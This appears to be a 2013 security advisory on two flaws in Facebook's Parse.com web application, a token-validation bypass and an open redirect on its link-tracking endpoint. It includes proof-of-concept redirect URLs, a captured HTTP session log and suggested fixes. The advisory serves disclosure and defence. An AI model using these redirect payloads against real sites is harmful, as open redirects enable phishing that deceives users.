Facebook Bug Bounty #8 - Multiple Vulnerabilities

2013-07-06T00:00:00
ID VULNERLAB:993
Type vulnerlab
Reporter Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)
Modified 2013-07-06T00:00:00

Description

                                        
                                            Document Title:
===============
Facebook Bug Bounty #8 - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=993


Release Date:
=============
2013-07-06


Vulnerability Laboratory ID (VL-ID):
====================================
993


Common Vulnerability Scoring System:
====================================
4.3


Product & Service Introduction:
===============================
Facebook`s Parse is the cloud app platform for iOS, Android, JavaScript, Windows 8, Windows Phone 8, and OS X. With Parse, you can 
add a scalable and powerful backend in minutes and launch a full-featured app in record time without ever worrying about server management. 
We offer push notifications, social integration, data storage, and the ability to add rich custom logic to your app’s backend with Cloud Code.

Parse allows your team to focus more on creating a great user experience and forget server maintenance and complex infrastructure. 
Instantly add push notifications, data storage, social integration, and more the moment you integrate a Parse SDK into your app.

Parse allows your team to focus more on creating a great user experience and forget server maintenance and complex infrastructure. 
Instantly add push notifications, data storage, social integration, and more the moment you integrate a Parse SDK into your app. Connect 
your users via traditional logins or third party social networks, like Facebook and Twitter, with just a few lines of code. We take care 
of linking accounts across networks, resetting passwords, and keeping everything safe and secure so that you don’t have.

Parse simplifies the difficult task of adding real time push notifications to an application. Create, send, and target highly effective 
push notifications via the web-based push console, REST API, or client SDKs. With our millions and millions of notifications sent 
every day, you never have to worry about scaling. Parse always delivers.

Vendor Page:    https://www.facebook.com
Homepage: 	https://www.parse.com


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered 2 different web vulnerabilities in the official Facebook Parse Service Web Application.


Vulnerability Disclosure Timeline:
==================================
2013-07-07:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Facebook
Product: Parse.com - Web Application 2013 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
1.1
A token protection filter bypass flaw is detected in the official Facebook Parse Online Service Web Application.
The vulnerability allows remote attackers to bypass the unique id request for future exploitation.

The vulnerability is located in the not secure requested mkt_tok session parameter which is bound to the requested 
url as link. The attacker can easily change the token to an empty value to request later other urls. The token also 
never expires but its a unique generated to each person. Also important for the successful exploitation is that 
users on requests do not require a valid mid. The problem can also be located in the full validation of the included 
token and id request. Note the parameter `t` is required with an integer in the request for successful exploitation.

Exploitation of the vulnerability requires no privileged facebook parse.com appliation user account and only low 
user interaction. Successful exploitation results in the bypass of the unique link token validation.

Vulnerable Service(s):
				[+] Facebook - Parse.com - 2013Q2 

Vulnerable Parameter(s):
				[+] mtok


1.2
An open/unauthorized redirect web vulnerability is detected in the official Facebook Parse Online Service Web Application.
The vulnerability allows remote attackers to prepare client side redirects for external open or unauthorized redirects.

The vulnerability is located in mid to &&& url request. Remote attackers can exchange after the &&& the internal url with the 
same session to redirect on client-side.

Exploitation of the redirect web vulnerability requires low or medium user interaction and no application user account. 
Successful exploitation of the vulnerability result in open or unauthorized redirects to websites by client side requests.

Vulnerable Service(s):
				[+] Facebook - Parse.com - 2013Q2 

Vulnerable Parameter(s):
				[+] mid > &&& [>


Proof of Concept (PoC):
=======================
The session and redirect vulnerability can be exploited by remote attackers without privileged application user account and 
with low or medium user interaction. For demonstration or reproduce ...


Standard Request:
http://link.parse.com/trk?t=2&mid=NzEzLVlGUS0wODQ6NzE4OjExNDY6NDY2OjA6MTExOTo3OjIwODQ2NDU6YWRtaW5AdnVsbmVyYW
JpbGl0eS1sYWIuY29t&&&http://blog.parse.com/2013/06/27/you-built-a-beautiful-mobile-app-but-didnt-get-any-installs-now-what/?
mkt_tok=3RkMMJWWfF9wsRonuqjPZKXonjHpfsX66%2BQpX6OzlMI%2F0ER3fOvrPUfGjI4ATcNrI%2BSLDwEYGJlv6SgFTbHGMblmy7gNUxU%3D


Example:
http://link.parse.com/trk?t=[INTEGER]&mid=[EMPTY NOT RECOGNIZED FOR REQUEST]&&&http://[EXTERNAL URL AS SOURCE][-NO MKT TOKEN]%3D

PoC:
http://link.parse.com/trk?t=2&mid=&&&http://www.vulnerability-lab.com[-NO MKT TOKEN]

- External open redirect possible
- External open file load possible
- Token and Request protection does not recognize request with the given values but without token works perfect



--- Request Session Log ---
15:20:35.121[327ms][total 370ms] 
Status: 200[OK]

GET http://link.parse.com/trk?t=2&mid=&&&http://www.vulnerability-lab.com/ 
Load Flags[LOAD_DOCUMENT_URI  
LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[-1] Mime Type[text/html]
   

Request Headers:
      
Host[link.parse.com]
      
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
      
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
DNT[1]
      
Connection[keep-alive]
   

Response Headers:
      
Date[Sat, 29 Jun 2013 13:20:35 GMT]
      
Server[Apache]
      Connection[close]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Transfer-Encoding[chunked]
Content-Type[text/html]




15:20:35.511[321ms][total 650ms] 
Status: 200[OK]

GET http://www.vulnerability-lab.com/ Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[64649] Mime Type[text/html]

Request Headers:
      
Host[www.vulnerability-lab.com]
      
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0]
      
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]

DNT[1]
      
Referer[http://link.parse.com/trk?t=2&mid=&&&http://www.vulnerability-lab.com/]
      
Cookie[PHPSESSID=2e0a11f779ab0adc8ba23856280b10c0]
      Connection[keep-alive]
   

Response Headers:
      
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      
Content-Type[text/html]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Server[Microsoft-IIS/7.0]
      
X-Powered-By[ASP.NET]
      X-Powered-By-Plesk[PleskWin]
      Date[Sat, 29 Jun 2013 13:20:35 GMT]
      
Content-Length[64649]




--- Copy of Email `Get $100 in Facebook Mobile App Install Ads, View the Parse and IDEO Webcast Recap, and More` ---

Sender: community@parse.com

<tr ><td width="30"> </td>
<td style="background-color:#f0f0f0; color:#45555f; font-family:Helvetica,Tahoma; font-size:12px; line-height:18px; 
vertical-align:top; " bgcolor="#F0F0F0" width="580" ><br>
<div class="mktEditable" id="main_text" style="padding:20px; " ><p><a href=
"http://link.parse.com/trk?t=2&mid=NzEzLVlGUS0wODQ6NzE4OjExNDY6NDY2OjA6MTExOTo3OjIwODQ2NDU6YWRtaW5AdnVsbmVyYWJpbGl
0eS1sYWIuY29t&&&http://blog.parse.com/2013/06/27/you-built-a-beautiful-mobile-app-but-didnt-get-any-installs-now-what/?
mkt_tok=3RkMMJWWfF9wsRonuqjPZKXonjHpfsX66%2BQpX6OzlMI%2F0ER3fOvrPUfGjI4ATcNrI%2BSLDwEYGJlv6SgFTbHGMblmy7gNUxU%3D"
><img src="http://go.parse.com/rs/parse/images/Newsletter.jpg" alt="Image of Facebook giftcard with $100 on it. Caption: 
We got you something nice." width="540" height="260" /></a></p>
<p style="color: #45555f; font-family: Helvetica, Tahoma; font-size: 12px; font-weight: normal; line-height: 18px;">
<span style="font-size: 14px;"><a style="font-size: 14px;" href=
"http://link.parse.com/trk?t=2&mid=NzEzLVlGUS0wODQ6NzE4OjExNDY6NDY2OjA6MTExOTo3OjIwODQ2NDU6YWRtaW5AdnVsbmVyYWJpbGl
0eS1sYWIuY29t&&&http://blog.parse.com/2013/06/27/you-built-a-beautiful-mobile-app-but-didnt-get-any-installs-now-what/?
mkt_tok=3RkMMJWWfF9wsRonuqjPZKXonjHpfsX66%2BQpX6OzlMI%2F0ER3fOvrPUfGjI4ATcNrI%2BSLDwEYGJlv6SgFTbHGMblmy7gNUxU%3D"
>You Built a Beautiful Mobile App But Didn't Get Any Installs. Now What? Get $100 of Free Facebook Ad Credit to Increase 
Installs</a></span><span style="font-size: 14px;"><a style="font-size: 14px;" href=
"http://link.parse.com/trk?t=2&mid=NzEzLVlGUS0wODQ6NzE4OjExNDY6NDY2OjA6MTExOTo3OjIwODQ2NDU6YWRtaW5AdnVsbmVyYWJpbGl
0eS1sYWIuY29t&&&http://blog.parse.com/2013/06/27/you-built-a-beautiful-mobile-app-but-didnt-get-any-installs-now-what/?
mkt_tok=3RkMMJWWfF9wsRonuqjPZKXonjHpfsX66%2BQpX6OzlMI%2F0ER3fOvrPUfGjI4ATcNrI%2BSLDwEYGJlv6SgFTbHGMblmy7gNUxU%3D"
><br /></a></span></p>
<p>Facebook mobile app install ads are a new, effective way to grow your Parse-powered app. They enable you to: launch your 
ad with an easy to use ads tool, target the right people (in their news feeds), and measure & optimize performance. 
Login <a href=
"http://link.parse.com/trkt=2&mid=NzEzLVlGUS0wODQ6NzE4OjExNDY6NDY2OjA6MTExOTo3OjIwODQ2NDU6YWRtaW5AdnVsbmVyYWJpbGl
0eS1sYWIuY29t&&&https://parse.com/products/facebook_credits?mkt_tok=3RkMMJWWfF9wsRonuqjPZKXonjHpfsX66%2BQpX6OzlMI
%2F0ER3fOvrPUfGjI4ATcNrI%2BSLDwEYGJlv6SgFTbHGMblmy7gNUxU%3D"
>here</a> with your Parse account credentials to claim $100 in free mobile app install ad credits from Facebook and click <a href=
"http://link.parse.com/trk?t=2&mid=NzEzLVlGUS0wODQ6NzE4OjExNDY6NDY2OjA6MTExOTo3OjIwODQ2NDU6YWRtaW5AdnVsbmVyYWJpbGl0eS1sYWIuY29t&&&https://developers.
facebook.com/docs/tutorials/mobile-app-ads/?mkt_tok=3RkMMJWWfF9wsRonuqjPZKXonjHpfsX66%2BQpX6OzlMI%2F0ER3fOvrPUfGjI4ATcNrI%2
BSLDwEYGJlv6SgFTbHGMblmy7gNUxU%3D"
>here</a> to learn more about mobile app install ads.</p>



Solution - Fix & Patch:
=======================
1.1
The session vulnerability and recognized validation needs to be extended by a secure validation with separate checks.

1.2
The redirect vulnerability can be patched by a restriction of the requested &&& mid url parameter.
Another possibility is a white-list or second exception handling as filter protection to prevent open/unauthorized redirect.


Security Risk:
==============
1.1
The security risk of the session token protection bypass is estimated as medium(+).

1.2
The security risk of the open redirect web vulnerability is estimated as medium(-).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team]  -    Benjamin Kunz Mejri (bkm@evolution-sec.com)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2013 | Vulnerability Laboratory